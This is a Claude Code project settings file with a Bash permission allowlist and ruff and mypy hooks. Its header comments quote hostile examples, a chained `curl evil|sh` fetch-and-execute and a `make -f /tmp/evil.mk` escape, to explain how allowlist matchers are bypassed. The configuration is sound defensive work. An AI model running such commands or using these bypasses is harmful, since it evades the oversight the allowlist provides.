{
  "//": "SHARED, committed Claude Code permissions + hooks. Safe, portable, reviewable. Use the ':*'",
  "// ": "prefix matcher (e.g. \"git commit:*\"), NOT a bare-space glob (\"git commit *\"): ':*' respects",
  "//  ": "command boundaries, so a chained escape like `git commit -m x && curl evil|sh` is NOT",
  "//   ": "auto-approved. Machine-specific paths and higher-privilege conveniences belong in",
  "//    ": "settings.local.json (git-ignored), NOT here.",
  "//     ": "Two things ':*' does NOT protect against, learned from a security review:",
  "//      ": "(1) a COMMAND RUNNER needs no chaining to escape — 'uv run' takes any command as its",
  "//       ": "argument, so 'Bash(uv run:*)' auto-approves arbitrary execution. Allow specific tools.",
  "//        ": "(2) 'make:*' matches 'make -f /tmp/evil.mk', and 'make <target>' runs whatever the",
  "//         ": "in-repo Makefile says — which is editable. Exact targets, no ':*', close both.",
  "//          ": "Installing packages ('uv add') is left OUT deliberately: it is the supply-chain gate,",
  "//           ": "it is rare, and the hooks below execute new dependencies automatically.",
  "permissions": {
    "allow": [
      "Bash(make help)",
      "Bash(make install)",
      "Bash(make test)",
      "Bash(make lint)",
      "Bash(make fmt)",
      "Bash(make typecheck)",
      "Bash(make check)",
      "Bash(make clean)",

      "Bash(uv run pytest:*)",
      "Bash(uv run ruff:*)",
      "Bash(uv run mypy:*)",
      "Bash(uv sync:*)",

      "Bash(git add:*)",
      "Bash(git commit:*)",
      "Bash(git checkout:*)",
      "Bash(git branch:*)",
      "Bash(git switch:*)",
      "Bash(git stash:*)",
      "Bash(git rebase:*)",
      "Bash(git merge:*)",
      "Bash(git fetch:*)",
      "Bash(git pull:*)",
      "Bash(git push:*)",
      "Bash(git diff:*)",
      "Bash(git log:*)",
      "Bash(git status:*)",
      "Bash(git ls-files:*)",
      "Bash(git check-ignore:*)",

      "Bash(gh pr:*)",
      "Bash(gh run:*)",
      "Bash(gh repo:*)",

      "Bash(command -v:*)",

      "WebSearch"
    ]
  },
  "enabledPlugins": {
    "superpowers@claude-plugins-official": true,
    "commit-commands@claude-plugins-official": true
  },
  "hooks": {
    "PostToolUse": [
      {
        "//": "Auto-format any Python file the moment Claude writes or edits it, so formatting never drifts.",
        "matcher": "Write|Edit|MultiEdit",
        "hooks": [
          {
            "type": "command",
            "command": "jq -r '.tool_input.file_path // empty' | { read -r f; case \"$f\" in *.py|*.pyi) uv run ruff format \"$f\";; esac; } >/dev/null 2>&1 || true",
            "statusMessage": "Formatting with ruff..."
          }
        ]
      }
    ],
    "Stop": [
      {
        "//": "Type-check src/ when Claude finishes a turn; surface any mypy errors back into the session.",
        "hooks": [
          {
            "type": "command",
            "command": "o=$(uv run mypy src 2>&1); s=$?; [ $s -ne 0 ] && printf '%s' \"$o\" | jq -Rs '{systemMessage: (\"mypy type errors in src/:\\n\" + .)}'; true",
            "statusMessage": "Type-checking src/ with mypy..."
          }
        ]
      }
    ]
  }
}
